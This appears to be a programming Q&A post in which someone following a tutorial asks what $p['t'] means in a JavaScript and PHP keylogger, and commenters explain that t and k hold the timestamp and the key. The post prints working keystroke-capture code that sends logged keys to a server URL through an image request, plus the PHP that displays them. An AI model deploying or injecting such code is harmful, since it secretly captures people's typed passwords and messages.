# What does $p['t] mean in this keylogger code?

Tags: javascript, php, arrays, foreach, keylogger

I hope you're all doing well. So I'm trying to follow a tutorial to make a simple keylogger with Java Script and PHP, and there's one particular line in the code that confuses me.

In one of the bits of code in charge of reading the key strokes there is a $p['t'] written inside the for each loop.  What does this mean?

This is the code that creates the presses array:

```js
var presses = [];
window.addEventListener("keydown", function (evt) {
  presses.push({
    t: Math.round(new Date().getTime() / 1000),
    k: evt.key,
  });
});
```

And this is the code that regularly sends it to the PHP reader file.

```js
window.setInterval(function () {
  if (presses.length > 5) {
    var data = encodeURIComponent(JSON.stringify(presses));
    // console.log(data);
    new Image().src = "http://localhost/test/keylog.php?k=" + data; // CHANGE THIS URL TO YOUR OWN!
    presses = [];
  }
}, 500);

foreach ($presses as $p) {
  printf("[%s] %s<br>", date("Y-m-d H:i:s", $p['t']), $p['k']);
}
```

Comment: Could you share the code that builds the ```$presses``` array? The array should be something like ```['press' => ['t' => "tvalue", 'k' => "kvalue"]```. I would assume the t is for the time and k is key.

Comment: Your code suggests that `$p['t']` is the date and time and `$p['k']` is the pressed key, but we don't know for sure. Please add the code show how you collect the keylog

Comment: I just posted the rest of the code, thanks in advance!

Comment: Ooops. Sorry, I just noticed t and k are properties in the object that is pushed.